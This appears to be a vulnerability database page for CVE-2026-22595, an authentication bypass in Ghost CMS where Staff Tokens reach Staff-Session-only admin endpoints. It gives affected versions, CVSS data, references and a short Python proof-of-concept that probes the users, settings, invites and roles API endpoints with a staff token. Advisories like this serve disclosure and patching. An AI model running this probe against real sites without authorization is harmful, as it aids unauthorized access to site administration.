CVE-2026-22595

Description

Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that have been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE

Ghost CMS 5.121.0 - 5.130.5

Ghost CMS 6.0.0 - 6.10.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-22595 PoC - Ghost CMS Staff Token Authentication Bypass
# This PoC demonstrates accessing Staff Session-only endpoints using Staff Token

TARGET_URL = "https://target-ghost-site.com"
STAFF_TOKEN = "your-staff-token-here"

# Endpoints that should require Staff Session but are accessible via Staff Token
SENSITIVE_ENDPOINTS = [
    "/ghost/api/admin/users/",
    "/ghost/api/admin/settings/",
    "/ghost/api/admin/invites/",
    "/ghost/api/admin/roles/"
]

def test_auth_bypass():
    """
    Test if Staff Token can access endpoints intended for Staff Session only
    """
    headers = {
        "Authorization": f"Ghost {STAFF_TOKEN}",
        "Content-Type": "application/json"
    }
    
    print(f"[*] Testing Ghost CMS Authentication Bypass (CVE-2026-22595)")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Token: {STAFF_TOKEN[:10]}...")
    print("-" * 50)
    
    for endpoint in SENSITIVE_ENDPOINTS:
        url = f"{TARGET_URL}{endpoint}"
        try:
            response = requests.get(url, headers=headers, timeout=10)
            
            if response.status_code == 200:
                print(f"[VULNERABLE] {endpoint} - Accessible via Staff Token")
                print(f"  Status: {response.status_code}")
            elif response.status_code == 401:
                print(f"[SAFE] {endpoint} - Properly protected")
            else:
                print(f"[?] {endpoint} - Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[ERROR] {endpoint} - {str(e)}")

if __name__ == "__main__":
    test_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22595
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22595
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22595/
[4] VulDB https://vuldb.com/cve/CVE-2026-22595
[5] https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8
[6] https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3
[7] https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22595", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:50.553", "lastModified": "2026-01-15T18:34:49.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that have been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0."}, {"lang": "es", "value": "Ghost es un sistema de gestión de contenido Node.js. En las versiones 5.121.0 a 5.130.5 y 6.0.0 a 6.10.3, una vulnerabilidad en el manejo de Ghost de la autenticación de token de personal permitió que ciertos puntos finales fueran accedidos que solo estaban destinados a ser accesibles a través de la autenticación de sesión de personal. Sistemas externos que han sido autenticados a través de tokens de personal para usuarios con rol de Administrador/Propietario habrían tenido acceso a estos puntos finales. Este problema ha sido parcheado en las versiones 5.130.6 y 6.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.121.0", "versionEndExcluding": "5.130.6", "matchCriteriaId": "ECA8ED19-2E79-4689-ACDD-C5A3F60BC162"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.11.0", "matchCriteriaId": "9EC484AC-A1F0-4C13-BFAB-9DA57116957D"}]}]}], "references": [{"url": "https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}